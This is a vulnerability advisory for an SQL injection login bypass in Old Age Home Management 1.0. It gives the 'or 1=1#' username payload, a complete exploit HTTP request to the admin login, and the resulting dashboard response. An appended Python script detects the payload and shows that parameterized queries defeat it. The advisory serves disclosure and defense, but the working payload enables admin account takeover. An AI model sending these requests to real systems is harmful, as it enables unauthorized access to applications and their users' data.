# Old Age Home Management 1.0 SQL Injection

Old Age Home Management version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
## Title: Old Age Home Management-2022-2023-1.0 SQLi-Bypass-Authentication-Account-Take-Over
## Author: nu11secur1ty
## Date: 04.29.2023
## Vendor: BY ANUJ KUMAR, https://phpgurukul.com/author/anujk305/
## Software: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/#google_vignette
## Reference: https://portswigger.net/web-security/sql-injection/lab-login-bypass

## Description:
The username parameter appears to be vulnerable to SQL injection attacks. The payloads `nu11secur1ty' or 1=1#` and `nu11secur1ty%27+or+1%3D1%23` (the same value, URL-encoded) were each submitted in the username parameter. The two requests produced different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. An attacker can easily take control of the admin account, after which everything is lost for this app and the users who rely on it.

STATUS: CRITICAL

[+]Exploit:
```http
POST /oahms/admin/login.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=n8igimmg4o7ddmpnbfueujouvg
Content-Length: 62
Cache-Control: max-age=0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/oahms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=
```

[+]Response:
```http
HTTP/1.1 200 OK
Date: Sat, 29 Apr 2023 05:32:07 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
Content-Security-Policy: upgrade-insecure-requests;
X-Powered-By: PHP/8.2.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13518

<!DOCTYPE html>
<html lang="en">
<head>
 <title>Old Age Home Management System|| Dashboard</title>
 <!-- base:css -->
 <link rel="stylesheet" href="vendors/typicons/typicons.css">
 <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css">
 <link rel="stylesheet" href="css/vertical-layout-light/style.css">
 <!-- endinject -->
</head>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0)

## Proof and Exploit
[href](https://streamable.com/qtj0bz)

## Time spent:
00:30:00
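As an added illustration (this is not part of the advisory and not the vendor's code), the following Python script decodes the exploit request body above the way PHP would, flags the decoded username with a simple detection heuristic, shows the query text that naive string concatenation would build from it, and contrasts that with a parameterized lookup that treats the payload as plain data. The `admins` table, its column names and the SHA-256 hashing are this example's own assumptions, not the application's schema.

```python
import hashlib
import sqlite3
from urllib.parse import parse_qs

# Constructed sample bodies: the first is the advisory's exploit body, the second an ordinary login.
EXPLOIT_BODY = "username=nu11secur1ty%27+or+1%3D1%23&password=password&submit="
NORMAL_BODY = "username=admin&password=correct+horse&submit="

# Tokens a username never legitimately needs but which break out of a quoted SQL literal.
SQLI_MARKERS = ("'", '"', "#", "--", "/*", ";")


def login_fields(body):
    """Decode an application/x-www-form-urlencoded body the way PHP fills $_POST."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def suspicious_username(username):
    """Detection heuristic for a WAF rule or log review: quote/comment characters or an ' or ' tautology."""
    u = username.lower()
    return any(m in u for m in SQLI_MARKERS) or " or " in u


def concatenated_query(username, password):
    """Query text that naive string concatenation builds (hypothetical table/column names).

    MySQL treats everything after '#' as a comment, so the password condition is discarded.
    """
    return f"SELECT id FROM admins WHERE username='{username}' AND password='{password}'"


def make_db():
    """In-memory stand-in for the admin table; schema and SHA-256 hashing are this example's choice."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO admins VALUES (1, 'admin', ?)",
                 (hashlib.sha256(b"correct horse").hexdigest(),))
    return conn


def safe_login(conn, username, password):
    """Parameterized lookup: the driver passes username as data, so the payload matches no row."""
    digest = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute("SELECT id FROM admins WHERE username=? AND password_hash=?",
                       (username, digest)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    for body in (EXPLOIT_BODY, NORMAL_BODY):
        f = login_fields(body)
        print(repr(f["username"]), "flagged:", suspicious_username(f["username"]),
              "login:", safe_login(make_db(), f["username"], f["password"]))
```

Running the script shows the exploit body decoding to `nu11secur1ty' or 1=1#`, being flagged, and failing the parameterized login, while the ordinary body logs in as admin id 1.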